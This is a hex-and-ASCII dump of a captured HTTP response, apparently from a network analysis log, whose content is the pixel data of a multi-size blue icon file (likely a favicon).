                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1407INData Raw: 37 63 32 35 0d 0a 00 00 01 00 05 00 10 10 00 00 01 00 20 00 68 04 00 00 56 00 00 00 18 18 00 00 01 00 20 00 88 09 00 00 be 04 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 46 0e 00 00 30 30 00 00 01 00 20 00 a8 25 00 00 ee 1e 00 00 40 40 00 00 01 00 20 00 28 42 00 00 96 44 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff
                                                                                                                                                                                                                                                                                                              Data Ascii: 7c25 hV F00 %@@ (BD(
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1407INData Raw: f5 ff 42 95 f6 ff cc e9 fd ff 4e b4 fb ff 40 ae fb ff 40 ae fb ff 73 c3 fc bc d1 e5 fc 36 2e 8a f5 f0 20 82 f5 ff 20 82 f5 ff 3f 93 f6 ff 5b a3 f7 ff 61 a6 f7 ff 67 a9 f8 ff 6c ad f8 ff 72 b0 f8 ff 90 c0 fa ff f1 f7 fe ff be e3 fd ff 7d c8 fc ff 4d b3 fb ff 9a d4 fc 88 ff ff ff 00 f0 f6 fe 14 6d ad f8 aa 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 5b a3 f7 ff 6a bf fb ff 40 ae fb ff 64 bd fb d0 f3 f9 fe 12 ff ff ff 00 ff ff ff 00 bb d9 fb 50 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff b2 db fc 90 bf e3 fd 58 fa fc fe 08 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 d1 e5 fc 36 c2 dd fc 48 66 a9 f8 b2 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20
                                                                                                                                                                                                                                                                                                              Data Ascii: BN@@s6. ?[aglr}Mm [j@dP X6Hf
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1409INData Raw: 48 c3 dd fc 48 c3 dd fc 48 c3 dd fc 48 c3 dd fc 48 c3 dd fc 48 c3 dd fc 48 c3 dd fc 48 c3 dd fc 48 c3 dd fc 48 c3 dd fc 48 e8 f3 fe 48 cb e9 fd 48 cb e9 fd 48 cb e9 fd 48 cb e9 fd 48 cb e9 fd 48 cb e9 fd 48 e8 f5 fe 20 6b ac f8 ac 20 82 f5 ff 20 81 f4 ff 20 81 f4 ff 20 82 f5 ff 20 81 f4 ff 20 81 f4 ff 20 82 f5 ff 20 81 f4 ff 20 81 f4 ff 20 82 f5 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff a3 cc fb ff 53 b6 fb ff 40 ad fa ff 40 ad fa ff 40 ad fa ff 40 ad fa ff 40 ad fa ff 92 d0 fc 94 92 c2 fa 80 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 27 86 f5 ff cd e3 fc ff da ef fe ff 5f bb fb ff 40 ae fb ff 40 ae fb ff 40 ae
                                                                                                                                                                                                                                                                                                              Data Ascii: HHHHHHHHHHHHHHHHHH k S@@@@@ '_@@@
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1410INData Raw: ff ff ff 02 fe fe fe 02 ff ff ff 02 ff ff ff 02 fe fe fe 02 ff ff ff 02 ff ff ff 02 fe fe fe 02 ff ff ff 02 ff ff ff 02 fe fe fe 02 ff ff ff 02 fe fe fe 02 ff ff ff 00 fe fe fe 02 fe fe fe 02 ff ff ff 00 fe fe fe 02 fe fe fe 02 ff ff ff 00 fe fe fe 02 fe fe fe 02 ff ff ff 00 fe fe fe 02 ff ff ff 00 fe fe fe 02 ff ff ff 00 ff ff ff 00 fe fe fe 02 ff ff ff 00 ff ff ff 00 fe fe fe 02 ff ff ff 00 ff ff ff 00 fe fe fe 02 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 fe fe fe 00 ff ff ff 00 ff ff ff 00 fe fe fe 00 ff ff ff 00 ff ff ff 00 fe fe fe 00 ff ff ff 00 ff ff ff 00 fe fe fe 00 ff ff ff 00 fe fe fe 02 fe fe fe 02 fe fe fe 02 fe fe fe
                                                                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1411INData Raw: ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 fd fd fe 06 f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c f9 fb fe 0c fc fd fe 0c fc fd fe 0c fa fd fe 0c fa fd fe 0c fa fd fe 0c fa fd fe 0c fa fd fe 0c fa fd fe 0c fa fd fe 0c fa fd fe 0c fe fe fe 02
                                                                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1413INData Raw: f5 ff 20 82 f5 ff be da fc 56 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 d0 e4 fc 3a 78 b3 f8 9e 69 ab f8 ae a1 ca fa 70 70 af f8 a8 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 2f 8a f5 f0 f7 fa fe 0c ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 df ed fd 28 27 86 f5 f8 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20
                                                                                                                                                                                                                                                                                                              Data Ascii: V:xipp /('
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1414INData Raw: 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff
                                                                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1415INData Raw: ff ff ff 00 ff ff ff 02 fe fe fe 00 ff ff ff 00 ff ff ff 02 fe fe fe 00 ff ff ff 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 02 fe fe fe 00 fe fe fe 00 ff ff ff 00 fe fe fe 00 fe fe fe 00 ff ff ff 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 00 fe fe fe 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff
                                                                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1417INData Raw: fe fe 00 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 00 fe fe fe 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 00 fe fe fe 02 ff ff ff 00 ff ff ff 00 fe fe fe 02 ff ff ff 00 fe fe fe 02 ff ff ff 00 fe fe fe 02 fe fe fe 02 ff ff ff 00 fe fe fe 02 ff ff ff 02 fe fe fe 00 ff ff ff 02
                                                                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1418INData Raw: f5 ff 20 81 f4 ff 20 82 f5 ff 20 81 f4 ff 20 81 f4 ff 20 82 f5 ff 20 81 f4 ff 20 81 f4 ff 81 b8 f9 ff aa cf fb ff ac d0 fb ff af d2 fb ff b2 d4 fb ff b5 d5 fb ff b8 d7 fb ff bb d9 fb ff be da fc ff c1 dc fc ff c4 dd fc ff c7 df fc ff c9 e1 fc ff cc e2 fc ff cf e4 fc ff d2 e6 fd ff d5 e7 fd ff dc eb fd ff fc fd fe ff ff ff ff ff ff ff ff ff fe fe fe ff ff ff ff ff ff ff ff ff fe fe fe ff e6 f4 fe ff d8 ee fe ff cc e9 fd ff c1 e5 fd ff a6 d9 fd ff 40 ae fb ff 40 ae fa ff 40 ae fa ff 4c b3 fb f2 fd fe fe 06 fe fe fe 00 fe fe fe 02 86 bb f9 94 20 82 f5 ff 20 81 f4 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 2e 8a f5 ff 3d 92 f6 ff 3f 93 f6 ff 42 95 f6 ff 45 97 f6 ff 48 98 f6 ff 4b 9a f6 ff 4e 9b f7 ff 51
                                                                                                                                                                                                                                                                                                              Data Ascii: @@@L .=?BEHKNQ
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1419INData Raw: ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 98 c5 fa d6 d0 eb fe 68 b8 e1 fd 62 cc e9 fd 4a f3 f9 fe 14 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 fe fe fe 00 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 00 fe fe fe 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 bf db fc 50 27 86 f5 fa 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81
                                                                                                                                                                                                                                                                                                              Data Ascii: hbJP'
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1421INData Raw: f7 fa fe 0c 7a b4 f9 a0 21 82 f5 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 20 81 f4 ff 39 90 f6 e6 c4 de fc 4a ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 02 ff ff ff 00 fe fe fe 02 ff ff ff 00 ff ff ff 00 fe fe fe 02 ff ff ff 00 fe fe fe 02 ff ff ff 00 fe fe fe 02 fe fe fe 02 ff ff ff 00 fe fe fe 02 ff ff ff 02 fe fe fe 00 ff ff ff 02 ff ff ff 02 fe fe fe 00 ff ff ff 02 ff ff ff 02 fe fe fe 00 cf e4 fc 3e 65 a9 f8 b6 24 84 f5 fc 20 81 f4 ff 20 81 f4 ff 20 82 f5 ff 20 81 f4 ff 20 81 f4 ff 20 82 f5 ff 39 90 f6 e6 95 c3 fa 80 f4 f9 fe 10 ff ff ff 02 ff ff ff
                                                                                                                                                                                                                                                                                                              Data Ascii: z! 9J>e$ 9
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1422INData Raw: ff ff 02 fe fe fe 00 ff ff ff 02 ff ff ff 02 fe fe fe 00 ff ff ff 02 ff ff ff 02 fe fe fe 00 ff ff ff 02 ff ff ff 02 fe fe fe 00 ff ff ff 02 ff ff ff 02 fe fe fe 00 ff ff ff 02 ff ff ff 02 fe fe fe 00 ff ff ff 02 ff ff ff 02 fe fe fe 00 ff ff ff 02 ff ff ff 02 fe fe fe 00 ff ff ff 02 ff ff ff 00 ff ff ff 02 ff ff ff 00 ff ff ff 00 ff ff ff 02 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00
                                                                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1423INData Raw: fe 02 fe fe fe 02 fe fe fe 02 fe fe fe 02 fe fe fe 02 fe fe fe 02 fe fe fe 02 fe fe fe 02 fe fe fe 02 fe fe fe 02 fe fe fe 02 fe fe fe 02 fe fe fe 02 fe fe fe 02 fe fe fe 02 fe fe fe 02 fe fe fe 02 fe fe fe 02 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 fe fe fe 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff
                                                                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1425INData Raw: 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff
                                                                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1426INData Raw: ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff
                                                                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1427INData Raw: ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00
                                                                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1429INData Raw: fb ff 40 ae fb ff 40 ae fb ff 40 ae fb ff 40 ae fb ff 40 ae fb ff 40 ae fb ff 40 ae fb ff 40 ae fb ff 40 ae fb ff 40 ae fb ff 40 ae fb ff 40 ae fb ff 40 ae fb ff 40 ae fb ff 40 ae fb ff 40 ae fb ff 92 d0 fc 9a ff ff ff 00 e2 ef fd 2a 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 77 b3 f8 ff fe fe fe ff 69
                                                                                                                                                                                                                                                                                                              Data Ascii: @@@@@@@@@@@@@@@@* wi
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1430INData Raw: ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 3e 93 f6 ff 8b be f9 ff 8d bf f9 ff 90 c1 fa ff 93 c3 fa ff 97 c4 fa ff 99 c6 fa ff 9c c7 fa ff 9f c9 fa ff a2 cb fa ff a5 cc fb ff a8 ce fb ff ab cf fb ff ad d1 fb ff b0 d3 fb ff b4 d5 fb ff b6 d6 fb ff b9 d8 fb ff bc d9 fc ff bf db fc ff c2 dd fc ff c5 de fc ff c8 e0 fc ff cd e2 fc ff ef f6 fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f6 fb fe ff d9 ef fe ff cd e9 fd ff c1 e5 fd ff b6 e0 fd ff ab db fd ff 9e d6 fc ff 4b b2 fb ff 40 ae fb ff 40 ae fb ff 40 ae fb ff 40 ae fb ff 85 cb fc aa ff ff ff 00 ff ff ff 00 ff ff ff 00 d5 e7 fd 38 29 87
                                                                                                                                                                                                                                                                                                              Data Ascii: >K@@@@8)
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1431INData Raw: 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 58 a1 f7 ff fe fe fe ff c8 e7 fd ff 40 ae fb ff 40 ae fb ff 40 ae fb ff 40 ae fb ff 40 ae fb ff 40 ae fb ff 40 ae fb ff 40 ae fb ff 40 ae fb ff 40 ae fb ff 4d b3 fb f2 e2 f2 fe 2e ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 d6 e8 fd 36 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5
                                                                                                                                                                                                                                                                                                              Data Ascii: X@@@@@@@@@@M.6
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1433INData Raw: a8 f8 ce ff ff ff 06 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 c9 e0 fc 46 2c 89 f5 f4 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff
                                                                                                                                                                                                                                                                                                              Data Ascii: F,
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1434INData Raw: ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 d0 e5 fc 3e 27 86 f5 fa 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 20 82 f5 ff 46 97 f6 da f4 f9 fe 10 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff
                                                                                                                                                                                                                                                                                                              Data Ascii: >' F
